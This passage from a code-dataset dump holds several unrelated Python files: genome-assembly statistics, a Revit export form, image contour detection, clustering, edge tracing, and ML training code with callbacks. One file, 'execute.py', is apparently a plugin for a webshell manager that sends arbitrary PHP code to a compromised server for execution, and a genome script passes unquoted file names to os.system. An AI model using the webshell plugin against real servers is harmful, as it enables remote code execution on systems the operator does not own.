in draftGenome:\n\t\tif( len(draftGenome[contigKey]) > (intMinLen - 1) 
):\n\t\t\tcontigLengths[contigKey] = len(draftGenome[contigKey])\n\t\t\t##print(contigKey + \" => \" + str(contigLengths[contigKey]))\n\n\t### End second inner loop\n\n\tcount = 0\n\n\t### Third inner loop to find longest contig and contig count given length > intMinLen\n\n\tfor contigID in sorted(contigLengths, key=contigLengths.__getitem__, reverse=True):\n\t\tif( contigLengths[contigID] > (intMinLen - 1) ):\n\t\t\tif(count == 0):\n\t\t\t\tmaxContig.append(contigLengths[contigID])\n\t\t\t\ttop = 1\n\t\t\tcount = count + 1\n\t\t\tdrLength = drLength + contigLengths[contigID]\n\tdraftLength.append(drLength)\n\t\n\t### End third inner loop\n \n\tcontigCount.append(count)\n\n\tavgContig.append(draftLength[idxFile]/contigCount[idxFile])\n\n\t### to compute N50, find the contig that 'resides' at 1/2 of draftLength\n\t\n\tdrLength = 0\n\tcumulativeLength = 0\n\n\t### Fourth inner loop to calculate N50\n\t\n\tfor contigID in sorted(contigLengths, key=contigLengths.__getitem__, reverse=True):\n\t\tif( contigLengths[contigID] > (intMinLen - 1) ):\n\t\t\tcumulativeLength = cumulativeLength + contigLengths[contigID]\n\t\tif(cumulativeLength > (draftLength[idxFile]/2)):\n\t\t\tcontigN50.append(contigLengths[contigID])\n\t\t\tbreak\n\t\n\t### End fourth inner loop\n\n\tdraftContigs = []\n\tdraftGenome = {}\n\tcontigLengths = {}\n\tidCount = 0\n\tcontigID = \"\"\n\tcontigStr = \"\" \n\n\tidxFile = idxFile + 1\n\n##### End of multiple input file loop #####\t\n\nidx = 0\n\nfor idx in range(len(inFileName)):\n\tif ( args.format == 'verbose' or args.format == 'v' ):\n\t\tprint(\"Assembly File\\tMinimum Contig Length:\\tcontigCount\\tavgContig\\tN50\\tmaxContig\\tdraftLength\")\n\t\tprint(\"{}\\t\".format(inFileName[idx]), \">\", intMinLen - 1, \"bp:\\t\", contigCount[idx], \"\\t\", \"%.0f\" % avgContig[idx], \"\\t\", contigN50[idx], \"\\t\", maxContig[idx], \"\\t\", draftLength[idx])\n\telif( args.format == 'brief' or args.format == 'b' ):\n\t\tprint(\"Assembly\\tcontigCount\\tavgContig\\tN50\\tmaxContig\")\n\t\tprint(inFileName[idx] + \"\\t\" + str(contigCount[idx]) + \"\\t\" + str(\"%.0f\" % avgContig[idx]) + \"\\t\" + str(contigN50[idx]) + \"\\t\" + str(maxContig[idx]))\n\telif ( args.format == 'tsv' or args.format == 's' ):\n\t\tprint(str(contigCount[idx]) + \"\\t\" + str(\"%.0f\" % avgContig[idx]) + \"\\t\" + str(contigN50[idx]) + \"\\t\" + str(maxContig[idx]))\n\telif ( args.format == 'csv' or args.format == 'c' ):\n\t\tprint(inFileName[idx] + \",\" + str(contigCount[idx]) + \",\" + str(\"%.0f\" % avgContig[idx]) + \",\" + str(contigN50[idx]) + \",\" + str(maxContig[idx]))\n\tidx = idx + 1\n\n\t\n### Judgement Day ### \n### All assembly files are sent to Hel except for theWorthy ###\n\n## index of the file with optimal assembly metrics\ntheWorthy = 0\n\nfor helCount in range( 1, len(inFileName) ):\n\tif(avgContig[helCount] > avgContig[theWorthy]):\n\t\ttheWorthy = helCount\n\t\t##print(theWorthy, \" \", avgContig[helCount], \" \", avgContig[theWorthy])\n\telif(contigCount[helCount] < contigCount[theWorthy]):\n\t\ttheWorthy = helCount\n\t\t\t\nidx = 0\n\nfor idx in range( len(inFileName) ):\n\tif(idx != theWorthy):\n\t\tos.system(\"mv -v {} {}\".format(args.filename[idx].name, helHeim))\n\n","sub_path":"multiFastaContigAvgJudgement.py","file_name":"multiFastaContigAvgJudgement.py","file_ext":"py","file_size_in_byte":6891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"241151537","text":"import revitron\nfrom revitron import _\nfrom rpw.ui.forms 
import FlexForm, TextBox, Button, Label, Separator, ComboBox\nfrom collections import defaultdict\nimport System.Windows\n\ndef addFields(components, fields):\n    for field in fields:\n        if field == '---':\n            components.append(Separator())\n        else:\n            key = revitron.String.sanitize(field)\n            components.append(Label(field))\n            components.append(TextBox(key, Text=config.get(key)))\n    return components\n\nif not revitron.Document().isFamily():\n    \n    config = revitron.DocumentConfigStorage().get('revitron.export', defaultdict())\n    \n    components = addFields([], \n    [\n        'Sheet Export Directory',\n        'Sheet Naming Template',\n        'Sheet Size Parameter Name',\n        'Default Sheet Size',\n        'Sheet Orientation Parameter Name'\n    ])\n\n    orientationField = 'Default Sheet Orientation'\n    orientationKey = revitron.String.sanitize(orientationField)\n    orientations = ['Landscape', 'Portrait']\n    default = orientations[0]\n    if config.get(orientationKey) in orientations:\n        default = config.get(orientationKey)\n    components.append(Label(orientationField))\n    components.append(ComboBox(orientationKey, orientations, default=default))\n    \n    components = addFields(components, \n    [\n        '---',\n        'PDF Printer Address',\n        'PDF Temporary Output Path',\n        '---',\n        'DWG Export Setup'\n    ])\n    \n    components.append(Label(''))\n    components.append(Button('Save', Width=100, HorizontalAlignment=System.Windows.HorizontalAlignment.Right))\n    \n    form = FlexForm('Revitron PDF and DWG Export Settings', components)\n    form.show()\n    \n    if form.values: \n        revitron.DocumentConfigStorage().set('revitron.export', form.values)\n    \n    \n    ","sub_path":"Revitron.tab/Revitron.panel/Export.pulldown/Export Settings.pushbutton/Export Settings_script.py","file_name":"Export Settings_script.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"128175807","text":"#!/Users/jj/.virtualenvs/deep/bin/python\n\nPATH = \"./tmp/\"\nRESULT_PATH = \"./res/\"\nRES_NAME = \"blackboxed.jpg\"\n\n\ndef show_image(img_path):\n    \"\"\"\n    Return Image\n    :param img_path: Image Path you want to show\n    :return: no value, show image\n    \"\"\"\n    from matplotlib import pyplot as plt\n\n    dpi = 200  # control parameter\n    im_data = plt.imread(img_path)\n    _channel = im_data.shape\n    fig_size = _channel[0] / float(dpi), _channel[1] / float(dpi)\n\n    plt.figure(figsize=fig_size)\n    plt.xticks([]), plt.yticks([])\n    plt.imshow(im_data)\n    plt.show()\n\n\ndef black_box(input_path):\n    \"\"\"\n    Using Black-Box Algorithm (==Double Contours)\n    :param input_path: image path\n    :return: cv2 object(list) by black-box algorithm\n    \"\"\"\n    import cv2\n    raw_image = cv2.imread(input_path)\n    first_img = raw_image.copy()\n\n    img_to_gray = cv2.cvtColor(first_img, cv2.COLOR_BGR2GRAY)\n    _, thresh = cv2.threshold(img_to_gray, 127, 255, 0)\n    _, contours, _ = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n    # first-contours\n    for c in contours:\n        x, y, w, h = cv2.boundingRect(c)\n        channel_shape = first_img.shape\n        if w < channel_shape[0] * 0.05:\n            cv2.rectangle(first_img, (x, y), (x + w + 10, y + h), (0, 0, 0), -1)\n\n    last_img = raw_image.copy()\n    img_to_gray_ = cv2.cvtColor(first_img, cv2.COLOR_BGR2GRAY)\n    cv2.Canny(img_to_gray_, 50, 200, apertureSize=3)\n    blur_ = cv2.blur(img_to_gray_, (5, 5))\n    cv2.threshold(blur_, 127, 255, 0)\n    _, contours, _ = cv2.findContours(blur_, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n    # second-contours\n    idx = 0\n    for cnt in contours:\n        idx += 1\n        x, y, w, h = cv2.boundingRect(cnt)\n        
channel = last_img.shape\n if (w / h > 8) & (w / h < 15):\n cv2.rectangle(last_img, (x, y), (x + w + 10, y + h), (0, 255, 0), 3)\n cv2.putText(last_img, str(idx), (x, y), cv2.FONT_HERSHEY_SIMPLEX, 2, (0, 0, 255), 4)\n print(\"contour details\\t\", 'x : ', x, 'y : ', y, 'w : ', w, 'h : ', h, channel, w / channel[0]\n , h / channel[1], w / h)\n '''\n if idx == 529:\n cv2.imwrite(SAVE_PATH + \"box/\" + input_path[-11:-4] + \".png\", raw_image[y : y + h, x : x + w])\n '''\n\n cv2.imwrite(RESULT_PATH + input_path[-11:-4] + '_' + RES_NAME, last_img)\n print('Saving image finished!! ')\n\n return last_img\n\n\nif __name__ == '__main__':\n import matplotlib\n import sys\n\n matplotlib.use('TkAgg') # TkAgg line is for Mac.\n\n file_name = sys.argv[1]\n black_box_return = black_box(PATH + file_name)\n show_image(RESULT_PATH + file_name[:-4] + '_' + RES_NAME)\n","sub_path":"predict-digit/blackbox.py","file_name":"blackbox.py","file_ext":"py","file_size_in_byte":2678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"70738417","text":"# coding: utf-8\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom collections import defaultdict\n\n#正态分布N~(3,1)\nX1 = np.random.randn(2,25)+3\n#正态分布N~(10,1)\nX2 = np.random.randn(2,25)+10\n\nX = np.hstack((X1,X2))\n#显示\nplt.plot(X1[0],X1[1],'bo')\nplt.plot(X2[0],X2[1],'ro')\nplt.show()\n\n\n\n\n\n#聚类簇数\nk=2\ndef dist(C1,C2):\n '''\n 计算两个簇之间的平均值的距离\n '''\n C1 = list(C1)\n C2 = list(C2)\n len_C1 = len(C1)\n len_C2 = len(C2)\n if len_C1==1:\n C1_dist = C1\n else:\n C1 = np.array(C1)\n C1 = C1.reshape(len_C1,2)\n C1_dist = np.mean(C1,0)\n if len_C2==1:\n C2_dist = C2\n else:\n C2 = np.array(C2)\n C2 = C2.reshape(len_C2,2)\n C2_dist = np.mean(C2,0)\n distance = np.sqrt(np.sum((np.array(C1_dist)-np.array(C2_dist))**2))\n return distance\n\n\n#初始化聚类簇\nC=defaultdict(set)\nfor num in range(X.shape[1]):\n C[num].add(tuple(X[:,num]))\n#初始化距离矩阵\nM = np.zeros((X.shape[1],X.shape[1]))#簇距离矩阵\nfor i in range(X.shape[1]):\n for j in range(X.shape[1]):\n M[i][j]= dist(C[i],C[j])\n#初始化当前聚类簇个数\ncurrent_k = X.shape[1]\n\nwhile current_k >k:\n dist_min_i=0\n dist_min_j=1\n dist_min = M[dist_min_i][dist_min_j]\n #找出距离最近的两个聚类簇合并\n for i in range(current_k):\n for j in range(current_k):\n temp = M[i][j]\n if i!=j and temp octant), (cos__> octant)\n mdly__, mdlx__ = ~(up__ | dwn__), ~(lft__ | rgt__)\n # merge in 4 bilateral axes\n axes_mask__ = [\n mdly__ & (rgt__ | lft__), (dwn__ & rgt__) | (up__ & lft__), # 0, 45 deg\n (dwn__ | up__) & mdlx__, (dwn__ & lft__) | (up__ & rgt__), # 90, 135 deg\n ]\n max_mask__ = np.zeros_like(blob.mask__, dtype=bool)\n # local max from cross-comp in each axis:\n for axis_mask__, (ydir, xdir) in zip(axes_mask__, ((0,1),(1,1),(1,0),(1,-1))): # y,x direction per axis\n # axis AND mask:\n mask__ = axis_mask__ & blob.mask__\n y_, x_ = mask__.nonzero()\n # neighbors:\n yn1_, xn1_ = y_ + ydir, x_ + xdir\n yn2_, xn2_ = y_ - ydir, x_ - xdir\n # computed vals\n axis1_ = (0 <= yn1_) & (yn1_ < Y) & (0 <= xn1_) & (xn1_ < X)\n axis2_ = (0 <= yn2_) & (yn2_ < Y) & (0 <= xn2_) & (xn2_ < X)\n # compare values\n not_max_ = np.zeros_like(y_, dtype=bool)\n not_max_[axis1_] |= (g__[y_[axis1_], x_[axis1_]] < g__[yn1_[axis1_], xn1_[axis1_]])\n not_max_[axis2_] |= (g__[y_[axis2_], x_[axis2_]] < g__[yn2_[axis2_], xn2_[axis2_]])\n # select maxes\n mask__[y_[not_max_], x_[not_max_]] = False\n # add to max_mask__\n max_mask__ |= mask__\n\n return max_mask__\n\n\ndef trace_max(blob, mask__, verbose=False):\n\n max_ = 
{*zip(*mask__.nonzero())}  # convert mask__ into a set of (y,x)\n\n    if verbose:\n        step = 100 / len(max_)  # progress % percent per pixel\n        progress = 0.0; print(f\"\\rTracing max... {round(progress)} %\", end=\"\"); sys.stdout.flush()\n\n    P_ = []\n    link_ = set()\n    while max_:  # queue of (y,x,P)s\n        y, x = max_.pop()\n        qtrace = deque([(y, x, None)])  # queue to trace, starting with (y, x) from max_\n\n        while qtrace:\n            # initialize dert to form P\n            y, x, _P = qtrace.popleft()  # pop from queue\n            i = blob.i__[blob.ibox.slice()][y, x]  # get i\n            dy, dx, g = blob.der__t.get_pixel(y, x)  # get dy, dx, g\n            m = ave_dangle  # m is at maximum value because P direction is the same as dert gradient direction\n            assert g > 0, \"g must be positive\"\n            P = form_P(blob, CP(yx=(y, x), axis=(dy/g, dx/g), cells={(y,x)}, dert_=[(y, x, i, dy, dx, g, m)]))\n            P_ += [P]\n            if _P is not None:\n                link_ |= {(_P, P)}\n\n            # search in max_ path\n            adjacents = max_ & {*product(range(y-1,y+2), range(x-1,x+2))}  # search neighbors\n            qtrace.extend(((_y, _x, P) for _y, _x in adjacents))\n            max_ -= adjacents\n            # set difference = first set AND not both sets: https://www.scaler.com/topics/python-set-difference/#\n        if verbose:\n            progress += step; print(f\"\\rTracing max... {round(progress)} %\", end=\"\"); sys.stdout.flush()\n\n    if verbose: print(\"\\r\" + \" \" * 79, end=\"\"); sys.stdout.flush(); print(\"\\r\", end=\"\")\n\n    return P_, link_\n\ndef form_P(blob, P):\n\n    scan_direction(blob, P, fleft=1)  # scan left\n    scan_direction(blob, P, fleft=0)  # scan right\n    # init:\n    _, _, I, Dy, Dx, G, Ma = map(sum, zip(*P.dert_))\n    L = len(P.dert_)\n    M = ave_g*L - G\n    G = np.hypot(Dy, Dx)  # recompute G\n    P.ptuple = Tptuple(I, Dy, Dx, G, M, Ma, L)\n    P.yx = P.dert_[L//2][:2]  # new center\n\n    return P\n\ndef scan_direction(blob, P, fleft):  # leftward or rightward from y,x\n\n    Y, X = blob.mask__.shape  # boundary\n    sin,cos = _dy,_dx = P.axis  # unpack axis\n    _y, _x = P.yx  # start with pivot\n    r = cos*_y - sin*_x  # from P line equation: cos*y - sin*x = r = constant\n    _cy,_cx = round(_y), round(_x)  # keep initial cell\n    y, x = (_y-sin,_x-cos) if fleft else (_y+sin, _x+cos)  # first dert in the direction of axis\n\n    while True:  # scan to blob boundary or angle miss\n        x0, y0 = int(x), int(y)  # floor\n        x1, y1 = x0 + 1, y0 + 1  # ceiling\n        if x0 < 0 or x1 >= X or y0 < 0 or y1 >= Y: break  # boundary check\n        kernel = [  # cell weighing by inverse distance from float y,x:\n            # https://www.researchgate.net/publication/241293868_A_study_of_sub-pixel_interpolation_algorithm_in_digital_speckle_correlation_method\n            (y0, x0, (y1 - y) * (x1 - x)),\n            (y0, x1, (y1 - y) * (x - x0)),\n            (y1, x0, (y - y0) * (x1 - x)),\n            (y1, x1, (y - y0) * (x - x0))]\n        cy, cx = round(y), round(x)  # nearest cell of (y, x)\n        if not blob.mask__[cy, cx]:\n            break\n        if abs(cy-_cy) + abs(cx-_cx) == 2:  # mask of cell between (y,x) and (_y,_x)\n            my = (_cy+cy) / 2  # midpoint cell, P axis is above, below or over it\n            mx = (_cx+cx) / 2\n            _my_cos = sin * mx + r  # _my*cos at mx in P, to avoid division\n            my_cos = my * cos  # new cell\n            if cos < 0: my_cos, _my_cos = -my_cos, -_my_cos  # reverse sign for comparison because of cos\n            if abs(my_cos-_my_cos) > 1e-5:\n                ty, tx = (  # deviation from P axis: above/_y>y, below/_y<y\n                    ((_cy, cx) if _cy > cy else (cy, _cx))\n                )\n                if not blob.mask__[ty, tx]: break  # if the cell is masked, stop\n                P.cells |= {(ty,tx)}\n\n        ider__t = (blob.i__[blob.ibox.slice()],) + blob.der__t\n        i,dy,dx,g = (sum((par__[ky, kx] * dist for ky, kx, dist in kernel)) for par__ in ider__t)\n        mangle,dangle = comp_angle((_dy,_dx), 
(dy, dx))\n if mangle < 0: # terminate P if angle miss\n break\n P.cells |= {(cy, cx)} # add current cell to overlap\n _cy, _cx, _dy, _dx = cy, cx, dy, dx\n if fleft:\n P.dert_ = [(y,x,i,dy,dx,g,mangle)] + P.dert_ # append left\n y -= sin; x -= cos # next y,x\n else:\n P.dert_ = P.dert_ + [(y,x,i,dy,dx,g,mangle)] # append right\n y += sin; x += cos # next y,x\n\n# not revised:\ndef form_link_(blob, mask__):\n\n max_yx_ = set(zip(*mask__.nonzero())) # mask__ coordinates\n dert_root_ = defaultdict(set)\n for P in blob.P_:\n for y,x in P.cells & max_yx_:\n dert_root_[y,x].add(P)\n\n # trace edge from each P\n blob.P_link_ = set() # clear P_link_\n for P in blob.P_:\n traceq_ = deque(P.cells & max_yx_) # start with cells & max_\n traced_ = set(traceq_)\n while traceq_: # trace adjacent through max_\n _y, _x = traceq_.popleft()\n # check for root\n stop = False\n for _P in (dert_root_[_y, _x] - {P}):\n link = (P, _P) if P.id < _P.id else (_P, P)\n blob.P_link_.add(link)\n stop = True # stop when a root is reached\n if not stop: # continue\n yx_ = {*product(range(_y-1,_y+2), range(_x-1,_x+2))}\n yx_ = (yx_ & max_yx_) - traced_\n traceq_.extend(yx_)\n traced_ |= yx_","sub_path":"frame_2D_alg/vectorize_edge_blob/slice_edge.py","file_name":"slice_edge.py","file_ext":"py","file_size_in_byte":9326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"141009756","text":"import torch\nfrom torch import nn, optim\nfrom sklearn.metrics import accuracy_score\nfrom .utils import val_acc_per_subset\n\n\ndef train(model, train_dl, test_dl, epochs_per_set=1, lr=1e-3, buffer=None):\n criterion = nn.CrossEntropyLoss()\n optimizer = optim.SGD(model.parameters(), lr=lr)\n table = []\n\n for task_id, task in enumerate(train_dl):\n a = 1 / (task_id + 1)\n model.train()\n for input, target in task:\n input = input.float().cuda()\n target = target.cuda()\n for step in range(5):\n optimizer.zero_grad()\n output = model(input)\n loss_s = criterion(output, target)\n loss_r = 0\n if buffer:\n m_input, m_target = buffer.sample(len(input))\n if m_input is not None and m_target is not None:\n m_input = m_input.float().cuda()\n m_target = m_target.cuda()\n m_output = model(m_input)\n loss_r = criterion(m_output, m_target)\n else:\n loss_r = 0\n loss = a * loss_s + (1 - a) * loss_r\n loss.backward()\n optimizer.step()\n if buffer:\n buffer.update_memory(input, target)\n\n model.eval()\n if (task_id+1) % epochs_per_set == 0:\n predictions = []\n targets = []\n with torch.no_grad():\n for input, target in test_dl:\n input = input.cuda()\n output = model(input)\n predicted = torch.argmax(output, 1)\n predictions += predicted.cpu()\n targets += target\n\n val_acc = accuracy_score(targets, predictions)\n subset = task_id #[2 * task_id, 2 * task_id + 1]\n table.append([subset] + val_acc_per_subset(targets, predictions) + [val_acc])\n\n return table","sub_path":"utils/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"606399540","text":"from os import remove\nfrom uuid import uuid4\nfrom libs.config import alias, color\nfrom libs.myapp import send, open_editor, newfile\n\n\n@alias(True, func_alias=\"exec\", _type=\"SHELL\")\ndef run(editor: str = \"\", edit_args: str = \"\"):\n \"\"\"\n execute\n\n execute Custom PHP code by notepad / vi as default or your own editor, edit_args split by space.\n\n\n eg: execute {editor=\"\"} {edit_args=\"\"} execute code 
'\"--wait\"'\n \"\"\"\n file_name = str(uuid4()) + \".php\"\n real_file_path = newfile(file_name)\n\n open_editor(real_file_path, editor, edit_args)\n with open(real_file_path, \"r\") as f:\n code = f.read()\n if (code.startswith(\"\")):\n code = code[:-2]\n print(color.yellow(\"Execute php code...\"))\n res = send(code)\n if (not res):\n return\n text = res.r_text.strip()\n status_code = color.green(str(\n res.status_code)) if res.status_code == 200 else color.yellow(str(res.status_code))\n print(\n f\"\\n{color.green('Result:')}\\n[{status_code}] {color.cyan('length')}: {len(text)} \\n{text}\\n\")\n remove(real_file_path)\n","sub_path":"doughnuts/webshell_plugins/execute.py","file_name":"execute.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"613138700","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCallbacks implementation. Inspired by Keras.\n\"\"\"\n\n# NOTE(kudkudak): There is no (yet) standalone tensorboard, and I don't think it makes sense to use tensorboardX\nimport tensorflow\n\nimport timeit\nimport gin\nimport sys\nimport numpy as np\nimport pandas as pd\nimport os\nimport pickle\nimport logging\nimport time\nimport datetime\nimport json\nimport copy\nfrom collections import defaultdict, OrderedDict\n\nimport torch\n\n\nfrom gin.config import _OPERATIVE_CONFIG\n\nfrom src.utils import save_weights\nfrom src.utils import acc_chexnet_covid, auc_chexnet_covid, acc_chexnet_covid_numpy\n\ntypes_of_instance_to_save_in_csv = (int, float, complex, np.int64, np.int32, np.float32, np.float64, np.float128, str)\nlogger = logging.getLogger(__name__)\n\nclass CallbackList:\n def __init__(self, callbacks=None):\n callbacks = callbacks or []\n self.callbacks = [c for c in callbacks]\n\n def append(self, callback):\n self.callbacks.append(callback)\n\n def set_params(self, params):\n for callback in self.callbacks:\n callback.set_params(params)\n\n def set_model(self, model):\n for callback in self.callbacks:\n callback.set_model(model)\n\n def on_epoch_begin(self, epoch, logs=None):\n logs = logs or {}\n for callback in self.callbacks:\n callback.on_epoch_begin(epoch, logs)\n\n def on_epoch_end(self, epoch, logs=None):\n logs = logs or {}\n for callback in self.callbacks:\n callback.on_epoch_end(epoch, logs)\n\n def on_batch_begin(self, batch, logs=None):\n logs = logs or {}\n for callback in self.callbacks:\n callback.on_batch_begin(batch, logs)\n\n def on_batch_end(self, batch, logs=None):\n logs = logs or {}\n for callback in self.callbacks:\n callback.on_batch_end(batch, logs)\n\n def on_forward_begin(self, batch, data):\n for callback in self.callbacks:\n callback.on_forward_begin(batch, data)\n\n def on_backward_end(self, batch):\n for callback in self.callbacks:\n callback.on_backward_end(batch)\n\n def on_train_begin(self, logs=None):\n logs = logs or {}\n for callback in self.callbacks:\n callback.on_train_begin(logs)\n\n def on_train_end(self, logs=None):\n logs = logs or {}\n for callback in self.callbacks:\n callback.on_train_end(logs)\n\n def on_train_epoch_begin(self, epoch, logs):\n logs = logs or {}\n for callback in self.callbacks:\n if hasattr(callback, 'on_train_epoch_begin'):\n callback.on_train_epoch_begin(epoch, logs)\n\n def on_val_epoch_begin(self, epoch, logs):\n logs = logs or {}\n for callback in self.callbacks:\n if hasattr(callback, 'on_val_epoch_begin'):\n callback.on_val_epoch_begin(epoch, logs)\n\n def on_test_epoch_begin(self, epoch, logs):\n logs = logs or {}\n for 
callback in self.callbacks:\n if hasattr(callback, 'on_test_epoch_begin'):\n callback.on_test_epoch_begin(epoch, logs)\n\n def on_val_batch_end(self, batch, logs):\n logs = logs or {}\n for callback in self.callbacks:\n callback.on_val_batch_end(batch, logs)\n\n def __iter__(self):\n return iter(self.callbacks)\n\nclass Callback(object):\n def __init__(self):\n pass\n\n def set_config(self, config):\n self.config = config\n\n def set_meta_data(self, meta_data):\n self.meta_data = meta_data\n\n def set_save_path(self, save_path):\n self.save_path = save_path\n\n def set_optimizer(self, optimizer):\n self.optimizer = optimizer\n\n def set_model(self, model, ignore=True):\n if ignore:\n return\n self.model = model\n\n def set_params(self, params):\n self.params = params\n\n def set_dataloader(self, data):\n self.data = data\n\n def get_dataloader(self):\n return self.data\n\n def get_config(self):\n return self.config\n\n def get_meta_data(self):\n return self.meta_data\n\n def get_optimizer(self):\n return self.optimizer\n\n def get_params(self):\n return self.params\n\n def get_model(self):\n return self.model\n\n def get_save_path(self):\n return self.save_path\n\n def on_epoch_begin(self, epoch, logs):\n pass\n\n def on_epoch_end(self, epoch, logs):\n pass\n\n def on_batch_begin(self, batch, logs):\n pass\n\n def on_batch_end(self, batch, logs):\n pass\n\n def on_forward_begin(self, batch, data):\n pass\n\n def on_backward_end(self, batch):\n pass\n\n def on_train_begin(self, logs):\n pass\n\n def on_train_end(self, logs):\n pass\n\n def on_train_epoch_begin(self, epoch, logs):\n pass\n\n def on_val_epoch_begin(self, epoch, logs):\n pass\n\n def on_test_epoch_begin(self, epoch, logs):\n pass\n\n def on_val_batch_end(self, batch, logs):\n pass\n \n \n \nclass BaseLogger(Callback):\n \"\"\"Callback that accumulates epoch averages.\"\"\"\n def __init__(self):\n super(BaseLogger, self).__init__()\n\n def on_epoch_begin(self, epoch, logs=None):\n self.seen = 0\n self.totals = defaultdict(float)\n\n def on_batch_end(self, batch, logs=None):\n batch_size = logs.get('size', 0)\n self.seen += batch_size\n if logs is not None:\n for k, v in logs.items():\n self.totals[k] += v * batch_size\n\n\n def on_epoch_end(self, epoch, logs=None):\n if logs is not None:\n for k in self.totals:\n logs[k] = self.totals[k] / self.seen\n \n\n@gin.configurable\nclass GradualUnfreezing(Callback):\n \"\"\"\n Gradually unfreeze layers from last to first every unfreeze_every epochs.\n Assume layers are being progressively unfrozeon from the last layer.\n \"\"\"\n def __init__(self, unfreeze_every=1, level='lowest'):\n self.unfreeze_every = unfreeze_every\n self.layers_info_init = None\n self.level = level\n super(GradualUnfreezing, self).__init__()\n \n @staticmethod\n def pop_last_item(k):\n keywords = k.split('.')\n return '.'.join(keywords[:-1]), keywords[-1]\n \n def get_layers_info(self):\n \"\"\"\n group layers according to self.level\n This assumes layer names follow syntax of the following:\n 'densenet121.features.denseblock4.denselayer15.conv1.weight'\n If not, recommended to upgrade pytorch version.\n \n 'lowest' groups weight and bias etc. 
from each norm or conv layer\n 'layer' groups norm and conv from each denselayer\n 'block' groups all layers that belong to the same block\n \"\"\"\n layer_names_dict = OrderedDict()\n for name, parameter in self.model.named_parameters():\n layer_name, _ = self.pop_last_item(name)\n if self.level == 'layer' or self.level == 'block':\n layer_name_candidate, last_item = self.pop_last_item(layer_name)\n if last_item.startswith('conv') or last_item.startswith('norm'):\n layer_name = layer_name_candidate\n if self.level == 'block':\n layer_name_candidate, last_item = self.pop_last_item(layer_name)\n if 'layer' in last_item:\n layer_name = layer_name_candidate\n if layer_name not in layer_names_dict:\n layer_names_dict[layer_name] = parameter.requires_grad\n else:\n # consider a layer is unfrozen when all of its params have requires_grad=True\n layer_names_dict[layer_name] &= parameter.requires_grad\n \n #total_num_layers = len(layer_names_dict)\n num_unfrozen_layers = sum(layer_names_dict.values())\n return list(layer_names_dict.keys()), num_unfrozen_layers\n\n def unfreeze_additional_layers(self, epoch):\n num_layers_gradual_unfreeze = epoch // self.unfreeze_every\n num_layers_to_be_unfrozen_total = num_layers_gradual_unfreeze + self.num_unfrozen_layers_init\n layer_names_to_be_unfrozen = self.layers_info_init[-num_layers_to_be_unfrozen_total:]\n for layer_name in layer_names_to_be_unfrozen:\n for name, parameter in self.model.named_parameters():\n if name.startswith(layer_name):\n if not parameter.requires_grad:\n logger.info(f'Unfreezing {name}')\n parameter.requires_grad = True\n else:\n logger.info(f'Already unfrozen: {name}')\n \n \n def on_epoch_begin(self, epoch, logs):\n # 1. Get layer names and how many are unfrozen\n if self.layers_info_init is None:\n self.layers_info_init, self.num_unfrozen_layers_init = self.get_layers_info()\n # 2. Unfreeze subsequent epoch % unfreeze_every layers\n # This must be able to handle continuing to train from a saved checkpoint\n # If picking up from epoch 34, for example, we must unfreeze layers accordingly.\n self.unfreeze_additional_layers(epoch)\n \n\n@gin.configurable\nclass EarlyStopping(Callback):\n \"\"\"\n The source code of this class is under the MIT License and was copied from the Keras project,\n and has been modified.\n Stop training when a monitored quantity has stopped improving.\n Args:\n monitor (int): Quantity to be monitored.\n min_delta (float): Minimum change in the monitored quantity to qualify as an improvement,\n i.e. an absolute change of less than min_delta, will count as no improvement. \n (Default value = 0)\n patience (int): Number of epochs with no improvement after which training will be stopped.\n (Default value = 0)\n verbose (bool): Whether to print when early stopping is done.\n (Default value = False)\n mode (string): One of {'min', 'max'}. In `min` mode, training will stop when the quantity\n monitored has stopped decreasing; in `max` mode it will stop when the quantity monitored has\n stopped increasing. 
\n            (Default value = 'min')\n    \"\"\"\n\n    def __init__(self, *, monitor='val_loss', min_delta=0, patience=0, verbose=False, mode='min'):\n        super(EarlyStopping, self).__init__()\n\n        self.monitor = monitor\n        self.patience = patience\n        self.verbose = verbose\n        self.min_delta = min_delta\n        self.wait = 0\n        self.stopped_epoch = 0\n\n        if mode not in ['min', 'max']:\n            raise ValueError(\"Invalid mode '%s'\" % mode)\n        self.mode = mode\n\n        if mode == 'min':\n            self.min_delta *= -1\n            self.monitor_op = np.less\n        elif mode == 'max':\n            self.min_delta *= 1\n            self.monitor_op = np.greater\n\n    def on_train_begin(self, logs):\n        # Allow instances to be re-used\n        self.wait = 0\n        self.stopped_epoch = 0\n        self.best = np.Inf if self.mode == 'min' else -np.Inf\n\n    def on_epoch_end(self, epoch, logs):\n        current = logs[self.monitor]\n        if self.monitor_op(current - self.min_delta, self.best):\n            self.best = current\n            self.wait = 0\n        else:\n            self.wait += 1\n            if self.wait >= self.patience:\n                self.stopped_epoch = epoch\n                self.model.stop_training = True\n\n    def on_train_end(self, logs):\n        if self.stopped_epoch > 0 and self.verbose:\n            print('Epoch %05d: early stopping' % (self.stopped_epoch + 1))\n\n\n@gin.configurable\nclass CompletedStopping(Callback):\n\n    def __init__(self, *, monitor='acc_fmnist', patience=5, verbose=True):\n        super(CompletedStopping, self).__init__()\n\n        self.monitor = monitor\n        self.patience = patience\n\n        self.verbose = verbose\n\n        self.stopped_epoch = 0\n\n    def on_train_begin(self, logs):\n        # Allow instances to be re-used\n        self.stopped_epoch = 0\n        self.counter = 0\n\n    def on_epoch_end(self, epoch, logs):\n        current = logs[self.monitor]\n        if current == 100:\n            self.counter +=1\n\n        if self.counter>=self.patience:\n            self.stopped_epoch = epoch\n            self.model.stop_training = True\n\n    def on_train_end(self, logs):\n        if self.stopped_epoch > 0 and self.verbose:\n      